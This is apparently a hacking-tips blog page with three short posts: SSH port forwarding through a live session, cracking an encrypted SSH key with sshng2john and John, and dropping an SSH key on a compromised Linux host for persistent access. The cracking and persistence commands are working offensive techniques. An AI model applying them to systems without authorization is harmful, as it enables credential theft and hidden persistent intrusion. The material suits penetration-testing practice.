Tips & Tricks

Port Forwarding Through SSH Connections

There are multiple ways to configure SSH for port forwarding, and this post intends to serve as a handy cheatsheet that you can reference the next time you need this functionality.


When SSH is Already Established

If you already have an SSH connection up, you can insert SSH command mode by typing the following on a new line:
~C

Then you can issue the following command to configure a local port forward.
-L <attackerPort>:127.0.0.1:<localPort>

For example, let’s say you’re connected to a machine via SSH and find that a webserver is running on port 52846, but only allows local connections. You can run the following command to forward port 9002 from your Kali machine through the SSH connection and access the webserver.
-L 9002:127.0.0.1:52846

Now going to http://localhost:9002 will redirect through the tunnel and display the webpage that is listening on the remote system on port 52846.

Hacking Tutorial

Cracking SSH Keys Using John

Once you’ve come across an SSH key, they are sometimes encrypted and require a password to be passed along with it before you’re able to successfully use it for authentication. When this occurs, we can leverage John to extract the hash used to encrypt this key and attempt to crack it offline.


First, we’ll start by extracting the hash using SSHng2John.
python sshng2john.py ssh.key

Then we can rerun the above command, but redirect to a file.
python sshng2john.py /root/ssh.key > hash.ssh

And finally, we can pass it to John for cracking against a dictionary file.
john --wordlist=/opt/wordlists/rockyou.txt hash.ssh

Tips & Tricks

Dropping SSH Keys on Compromised Linux Hosts

Once you have a reverse shell, you may want to consider dropping a SSH key so that you can return at a later time. This guide intends to serve as a quick tutorial on how to do this.


From the Compromised Remote Host:

Navigate to and/or create the following directory.

/home/<user>/.ssh

Change into it, and then run the following command.

ssh-keygen -f id_rsa

This should generate a private key along with a public key. You’ll want to create an “authorized_keys” file by running the following command.

cat id_rsa.pub > authorized_keys

Then you’ll want to take your private key to your local system by running the following command and copying the contents.

cat id_rsa


On Your Local System:

Create a new file by running the following command and pasting the contents of your clipboard.

vi id_rsa

Then make the appropriate file permissions changes.

chmod 600 id_rsa

That’s it! You should now be able to SSH in.

ssh user@targetIP